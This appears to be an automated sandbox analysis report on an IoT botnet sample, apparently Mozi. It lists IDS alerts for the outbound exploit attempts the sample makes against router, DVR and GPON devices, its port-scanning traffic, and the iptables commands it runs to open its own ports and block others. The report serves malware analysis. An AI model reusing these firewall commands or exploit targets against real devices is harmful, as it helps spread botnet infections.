Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.101.203.193: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 103.105.215.18: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.85.109: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.190.192.194: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50256 -> 217.182.243.67:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.20:42672 -> 146.184.165.4:5555
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:44594 -> 170.246.231.239:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:44594 -> 170.246.231.239:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.133.197: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.91.195.37: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56750 -> 50.66.70.68:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56750 -> 50.66.70.68:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.226.148.46: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 113.131.128.13: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.20:56268 -> 115.87.204.89:81
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.85: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35814 -> 35.244.243.215:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41946 -> 45.65.120.55:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33440 -> 23.207.67.88:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33440 -> 23.207.67.88:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.207.67.88:80 -> 192.168.2.20:33440
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43164 -> 146.158.12.4:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36034 -> 23.217.112.105:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36034 -> 23.217.112.105:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.217.112.105:80 -> 192.168.2.20:36034
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:49646 -> 175.234.128.97:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:49646 -> 175.234.128.97:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50886 -> 44.239.233.229:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50886 -> 44.239.233.229:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.21.200.33: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41622 -> 13.126.136.27:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41622 -> 13.126.136.27:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.208.169.116: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.89.194.122: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40490 -> 23.76.236.93:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40490 -> 23.76.236.93:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.76.236.93:80 -> 192.168.2.20:40490
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.135.69.230: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.126.172.52: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.9.65.166: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.108.253: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 190.5.88.118: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 67.204.13.138: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.167.44: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.156.201.116: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.144.72.42: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.105.63.155: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:39386 -> 178.79.174.158:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:39386 -> 178.79.174.158:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.33.211.220: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 120.193.91.233:27697 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.94.73:8082 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:39138 -> 79.171.18.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:39138 -> 79.171.18.106:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41018 -> 166.88.243.237:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:38600 -> 51.83.246.144:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:38600 -> 51.83.246.144:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.110.157:17793 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:43474 -> 166.88.120.253:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:43474 -> 166.88.120.253:8080
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 166.88.120.253:8080 -> 192.168.2.20:43474
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.23.252.43: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40592 -> 95.8.122.63:8080
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40592 -> 95.8.122.63:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45922 -> 104.80.82.152:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45922 -> 104.80.82.152:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.80.82.152:80 -> 192.168.2.20:45922
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 149.104.34.37: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36852 -> 157.65.87.141:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36852 -> 157.65.87.141:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 128.233.16.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.40.37.31:80 -> 192.168.2.20:40260
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.57.107.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 153.126.135.194: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60106 -> 154.90.79.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60106 -> 154.90.79.101:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.8.127.178: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:42134 -> 23.34.199.82:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:42134 -> 23.34.199.82:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.34.199.82:80 -> 192.168.2.20:42134
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43048 -> 133.137.248.191:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:40260 -> 23.40.37.31:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35178 -> 18.228.54.139:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60998 -> 81.7.8.12:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:51938 -> 157.245.223.131:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:44880 -> 183.114.91.82:8080

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic	TCP traffic: 209.91.20.132 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 179.37.139.184 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 27.20.114.90 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 120.161.181.26 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 16.197.247.12 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 109.31.128.69 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 71.181.75.105 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 4.119.113.119 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 71.163.189.157 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 202.214.128.209 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 99.183.96.40 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 118.206.103.100 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 180.190.249.44 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 175.46.210.102 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 6.86.153.110 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 131.228.7.91 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 111.205.48.104 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 197.124.118.3 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 23.6.254.240 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 94.185.176.145 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 155.201.44.186 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 114.207.0.228 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 87.83.202.29 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 76.213.165.145 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 211.90.22.130 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 114.154.250.15 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 203.160.221.66 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 163.90.78.111 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 189.165.80.3 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 57.163.20.143 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 61.193.135.39 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 128.42.237.138 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 218.182.128.219 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 115.221.72.54 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 67.93.178.237 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 38.139.125.205 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 3.106.131.99 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 27.17.171.210 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 15.51.212.241 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 218.152.25.33 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 96.0.134.167 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 22.30.91.157 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 139.93.154.170 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 164.142.55.184 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 108.113.55.135 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 154.190.122.88 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 71.11.190.90 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 84.48.141.104 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 151.169.69.96 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 159.212.6.68 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.221.170.83 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 6.60.84.48 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 178.123.18.214 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 26.80.202.172 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 49.41.213.146 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 2.216.247.11 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 89.179.8.221 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 68.179.189.189 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 94.105.143.222 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 219.143.155.172 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 168.27.245.114 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 191.199.26.110 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 203.63.207.193 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 150.37.72.24 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 25.84.54.191 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 139.49.163.59 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 184.49.220.2 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 131.164.56.28 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 94.18.108.108 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 120.239.0.46 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 36.54.249.217 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 165.16.122.1 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 73.150.235.205 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 2.185.196.129 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 194.203.125.103 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 114.83.134.162 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 57.164.19.75 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 143.157.186.149 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 168.216.111.161 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 130.140.7.168 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 29.161.161.202 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 40.138.247.89 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 80.219.251.133 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 82.109.64.3 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 14.9.89.162 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 220.179.82.16 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 73.2.23.66 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 107.126.27.122 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 75.82.66.140 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 82.6.17.28 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 211.64.237.240 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 114.238.112.196 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 36.184.218.26 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 100.16.3.210 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 123.138.120.67 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 134.67.11.73 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 50.70.173.82 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 193.118.213.59 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 103.148.212.55 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 213.150.115.196 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 165.66.227.31 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 2.96.223.8 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 42.240.2.232 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 104.178.119.156 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 70.132.111.66 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 200.109.140.124 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 31.127.22.163 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 50.192.24.84 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 33.128.39.87 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 184.235.140.0 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 63.119.139.18 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 35.205.25.55 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 121.10.6.126 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 125.246.85.252 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 7.224.163.250 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 62.236.179.84 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 82.248.38.210 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 208.11.186.103 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 161.225.141.251 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 107.206.64.63 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.172.79.18 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 55.169.99.112 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 32.56.244.120 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.222.213.136 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 178.232.31.216 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 44.66.17.187 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 144.0.182.62 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 143.44.220.86 ports 2,5,6,8,9,52869

Executes the "iptables" command to insert, remove and/or manipulate rules

Show sources

Source: /bin/sh (PID: 4637)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4671)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4674)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4715)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4739)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4758)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4776)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4795)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4898)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4918)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4921)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4949)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4975)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4999)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5024)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5051)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5077)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5103)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5128)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5131)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5142)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5223)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5236)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5267)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5295)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5299)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5309)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5337)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT	Jump to behavior

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 47166 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42672 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 56268 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 56268
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53656 -> 37215

Source: global traffic	TCP traffic: 192.168.2.20:45402 -> 71.181.75.105:52869
Source: global traffic	TCP traffic: 192.168.2.20:34062 -> 168.27.245.114:49152
Source: global traffic	TCP traffic: 192.168.2.20:42054 -> 87.83.202.29:49152
Source: global traffic	TCP traffic: 192.168.2.20:39772 -> 137.88.31.213:8080
Source: global traffic	TCP traffic: 192.168.2.20:38560 -> 219.143.155.172:37215
Source: global traffic	TCP traffic: 192.168.2.20:37806 -> 24.81.183.180:8080
Source: global traffic	TCP traffic: 192.168.2.20:52474 -> 71.11.190.90:37215
Source: global traffic	TCP traffic: 192.168.2.20:33166 -> 191.250.144.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:57236 -> 37.215.228.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:47640 -> 159.110.183.145:8443
Source: global traffic	TCP traffic: 192.168.2.20:48294 -> 205.51.33.91:8080
Source: global traffic	TCP traffic: 192.168.2.20:49106 -> 103.102.254.14:81
Source: global traffic	TCP traffic: 192.168.2.20:58898 -> 204.189.67.153:81
Source: global traffic	TCP traffic: 192.168.2.20:53486 -> 164.142.55.184:52869
Source: global traffic	TCP traffic: 192.168.2.20:58446 -> 15.51.212.241:52869
